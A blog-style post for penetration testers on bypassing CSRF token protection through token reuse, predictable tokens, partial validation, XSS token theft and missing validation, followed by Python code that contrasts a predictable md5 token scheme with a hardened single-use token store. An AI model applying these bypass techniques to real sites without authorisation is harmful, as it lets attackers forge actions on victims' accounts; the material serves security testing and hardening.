Bypass CSRF token protection

Heya, as web and web security get more intense day by day, CSRF tokens are becoming a standard part of web security. Some time ago, using a CSRF token was enough for CSRF protection. However, CSRF token protection can be bypassed using several techniques, so this post briefly touches on the CSRF token protection bypass methods. It means that the next time a penetration tester sees CSRF token protection there is no need to be sad lol: he knows what to do next and how to find and exploit weaknesses in the CSRF token mechanism.

Token Redundancy

This flaw in the CSRF token protection mechanism is that the same CSRF token is accepted multiple times, which means that the token already used by our legitimate request can be reused in the attack payload. Ideally, every token expires once it is used and cannot be used again. In practice, a poor sense of security among developers leads to such flaws. While pentesting tokens, investigating token redundancy can come in handy ;).

Weak Token Encryption / Validation

The CSRF token is a string; it can be an encrypted (or hashed) string of some value that keeps on incrementing, which changes the token value each time. Let's say the CSRF token of a change-password form is
    md5(User_email + inc) // inc is a numeric value that keeps on incrementing
User_email is the email of the logged-in legitimate user. This is weak, because after some investigation the attacker can predict the value of the next token.

It is also possible that part of the token changes or increments while the other part remains the same. For example, a token value is
    SASDwakawe3ioxujwSXjiXguaxSGQjnjSjkaEEnkjxOOa12
The next token is
    SASDwakawe3ioxujwSXjiXguaxSGQjnjSjkaEEnkjxOOa13 // the digits at the end increment, then the letters like "a" roll over, and so on.
This token behaviour can also be predicted: after investigation the attacker can predict the next anti-CSRF token and use it in the attack payload.

In cases where the token is composed of two parts, one static and one changing, and the attacker is not able to predict the dynamic part, the attacker should investigate whether the static part of the anti-CSRF token gets validated without the dynamic part. For example, consider this CSRF token:
  MXAfiaW3IFUAxh820dOXADjwsiwDSajaSFFao/9cdfb439c7876e703e307864c9167a15
This shows that the anti-CSRF token is composed of two strings; the last part is clearly an MD5 hash. If the former part remains static across all requests while the MD5 hash keeps changing, it is worth the effort to check whether the application validates the token as a whole, or what happens if only the static part of the token is provided.

Bypass Anti CSRF Token By Using XSS (Cross Site Scripting)

The main idea is to obtain the anti-CSRF token via XSS, which requires the website to have an XSS vulnerability. This article describes how to use XSS to bypass an anti-CSRF token. Credits to the original author: Anti CSRF Token Protection Bypass Using XSS.

Token Validation Fail

One last thing the attacker can try is to test whether the token is really being validated at all: can the request be made without the token? This might seem lame lol, but hey, if Facebook can make such a blunder, anyone can.
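To show what a token mechanism that does not have the weaknesses listed above (token redundancy, predictable tokens, partial validation, and missing validation) looks like on the server side, here is an added Python example. It is not code from the original post; the `weak_token` function mirrors the post's `md5(User_email + inc)` scheme as the "before", and `CsrfTokenStore` is a hypothetical hardened store. Session ids and email addresses used in it are constructed sample values.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional


def weak_token(user_email: str, inc: int) -> str:
    """The predictable scheme from the post: md5 of a known email plus a counter.

    Nothing here is secret, so the token sequence is fully determined by
    public inputs. Kept only as the 'before' to contrast with CsrfTokenStore.
    """
    return hashlib.md5(f"{user_email}{inc}".encode()).hexdigest()


def predict_next_weak_token(user_email: str, observed_inc: int) -> str:
    """Why weak_token fails review: the next value follows from the last one."""
    return weak_token(user_email, observed_inc + 1)


class CsrfTokenStore:
    """Hypothetical server-side anti-CSRF token store (added example, not the post's code).

    Closes each weakness the post describes:
      * tokens come from a CSPRNG, so the next one cannot be predicted;
      * a token validates once and is then discarded (no token redundancy);
      * the submitted value must match the whole stored token in constant
        time, so a recognisable static part on its own never validates;
      * a missing or empty token is rejected outright (no validation fail);
      * tokens are bound to a session and expire after a TTL.
    """

    def __init__(self, ttl_seconds: float = 600.0) -> None:
        self.ttl = ttl_seconds
        # session_id -> {token: expiry on the monotonic clock}
        self._tokens: Dict[str, Dict[str, float]] = {}

    def issue(self, session_id: str) -> str:
        """Mint a fresh 256-bit token bound to this session."""
        token = secrets.token_urlsafe(32)
        self._tokens.setdefault(session_id, {})[token] = time.monotonic() + self.ttl
        return token

    def validate(self, session_id: str, submitted: Optional[str]) -> bool:
        """Return True exactly once per issued token, for its own session, before expiry."""
        if not submitted:  # absent or empty token: reject, never skip the check
            return False
        now = time.monotonic()
        live = self._tokens.get(session_id, {})
        for token, expiry in list(live.items()):
            if expiry < now:
                del live[token]  # stale token, drop it
                continue
            # Whole-string, constant-time comparison on bytes.
            if hmac.compare_digest(token.encode(), submitted.encode()):
                del live[token]  # single use: a replayed token will not match again
                return True
        return False


if __name__ == "__main__":
    store = CsrfTokenStore()
    session = "session-abc"  # constructed session id
    tok = store.issue(session)
    print("first use:", store.validate(session, tok))          # True
    print("replay:", store.validate(session, tok))             # False
    print("static prefix only:", store.validate(session, tok[:16]))  # False
    print("no token:", store.validate(session, None))          # False
```

Each `validate` call returns `True` at most once per token, so a replayed token, a truncated token, a token from another session, an expired token, or no token at all all come back `False`; that is the behaviour to look for when checking a real application's token handling.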

That is all I know and have read about CSRF token protection bypass methods. If you have any other technique, feel free to share.
